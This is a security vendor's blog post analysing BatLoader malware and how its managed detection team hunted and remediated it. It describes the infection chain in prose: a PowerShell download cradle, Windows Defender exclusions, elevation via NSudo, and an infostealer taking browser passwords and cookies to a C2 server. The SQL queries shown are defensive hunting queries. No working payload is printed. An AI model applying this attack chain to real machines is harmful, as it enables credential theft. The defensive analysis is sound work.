Tracking BatLoader Malware Using Uptycs

Blog Author
Uptycs Team

Contributed by: Nandakumar KJ & Josh Lemon


Stealthy, initial access malware known as BatLoader uses malvertising techniques. Due to how it embeds itself within a computer system, it’s challenging to fully remove it. Additionally, it makes use of legitimate tools for elevating privilege, decryption, and running malicious scripts to deploy second-stage infostealer malware, (e.g., Arkei/Vidar, Ursnif, Cobalt Strike Beacon, Rhadamanthys).


This blog post includes a technical analysis of the BatLoader malware along with a description of how Uptycs MDR analysts identify and remediate it. In many cases, we have provided the SQL queries used in our investigation.


Technical Analysis

BatLoader typically enters through malicious web pages that masquerade as trustworthy programs or software. Malvertising strategies and fake comments on forums having connections to BatLoader distribution locations can direct victims to these websites.


Uptycs recently observed where BatLoader initiated execution through an encoded PowerShell script. It used the WebClient.DownloadString method to retrieve the string from the URL to the local system.




Upon execution of the initial malicious PowerShell script, BatLoader executes additional PowerShell commands to add an exclusion to Windows Defender as part of a defense evasion technique.


MSdefender Exceptions


The PowerShell script also downloads and executes additional executables; zkoko.exe.gpg, Nsudo.exe, and gpg4win-2.2.5.exe. These are placed in the $USERPROFILE$\AppData\Roaming directory.


URL_connected _to download_Executables

Figure 3 - Domains accessed by PowerShell to collect second stage malware – osquery, DNS to process mapping


select * from DNS_lookup_events Where upt_asset_id ='ec2356f0-bbfa-8f79-ed7b-f6d972698e85' AND pid =1548 AND upt_time between timestamp '2023-03-01 05:50:00' AND timestamp '2023-03-01 06:10:00'


Downloaded executables

Figure 4 - Downloaded executables – Uptycs Real-Time Actions


The payload is decrypted using the gpg4win.exe binary, a common Windows email and file encryption package.




Nsudo.exe is a management tool to launch programs with elevated privileges. In this attack, it’s used to impair defense by hiding the window as the payload is being executed.




The infostealer malware, dropped by BatLoader, attempts to collect sensitive data from victims' systems via the Windows API. This includes information about system disk drives, disk types, BIOS, processor, computer name, and serial number.

Additionally, the malware crawls directories of installed browsers on a victim's machine as it attempts to collect information stores for the following: browsing histories, bookmarks, cookies, autofills, and login passwords. Once sensitive data is collected, it’s then relayed to the threat actor’s server. In the malware sample we observed, the command-and-control (C2) server ( is associated with the Rhadamanthys malware family.


Connect_to_suspicous IP

Figure 7 - C2 server connection – contextual details in the Uptycs detection UI


Uptycs MDR

The Uptycs managed detection and response engine includes built-in behavioral rules, YARA signatures, and threat intelligence data. Our skilled security analyst team constantly monitors detections and hunts for widespread and active threats in the environment.


From this BatLoader malware sample, we observed our victim system also being infected with Rhadamanthys. Along with YARA signature detections in memory discovering it, detection included behavioral rules from known actions that malware performs along with Uptycs threat intelligence matches.


Additionally, Uptycs EDR contextual detection provides important details about identified malware, mapped behavior in the ATT&CK Matrix (left pane, below), and a detection graph that shows process ancestry. Users can navigate to the toolkit data section in the detection, then click on the name to learn more.



Figure 8 - Rhadamanthys detection


Built atop osquery, the Uptycs agent has the ability to collect vast, high-quality telemetry from endpoints, cloud resources, and Kubernetes systems. You can see the telemetry data in the available osquery tables (e.g., Process_events, PowerShell_events, scheduled_tasks). You can view the open-source schema here, to which Uptycs has added a significant number of additional tables.


Using Uptycs Investigate feature, we were able to further investigate malicious activity by running SQL queries against the osquery tables containing data collected from the endpoint where we executed the malware. 



Figure 9 - Searching process_events for finding activity of suspicious user


select * from process_events where upt_asset_id ='ec2356f0-bbfa-8f79-ed7b-f6d972698e85' AND login_name = 'Administrator' AND upt_time between timestamp '2023-03-01 05:45:00' AND timestamp '2023-03-01 06:10:00'


Figure 10 - Searching socket_events to find executables that connect to the C2 server


select * from socket_events where upt_asset_id ='ec2356f0-bbfa-8f79-ed7b-f6d972698e85' AND upt_day =20230301 AND remote_address =''


Figure 11 - Searching api_events to find the api calls used by zokoko.exe


select * from api_events where upt_asset_id ='ec2356f0-bbfa-8f79-ed7b-f6d972698e85' and cmdline like '%powershell.exe  -command C:\Users\Administrator\AppData\Roaming\zkoko.exe%'


The Uptycs Managed Detection and Response (MDR) team responds to threats by using the Uptycs Protect remediation and blocking feature. It lets you kill, delete, pause, and scan the binary using YARA rules, or collect the file for additional analysis based on the detection graph for detected malicious activity (below). Additionally, we have the ability to manage users, run scripts on the host machine, quarantine the machine, or investigate the malicious process further.


Uptycs protect options

Figure 12 - Uptycs Protect – detection graph


Monitoring all potential threats in an environment is essential, especially those that abuse legitimate tools to obfuscate their presence like the BatLoader malware. The Uptycs MDR team makes this possible by detecting and taking action in response to threats in our customers environment.


Indicators of Compromise (IOCs)


   File name

Md5 hash









Domain/URL/IP Address

Malware Samples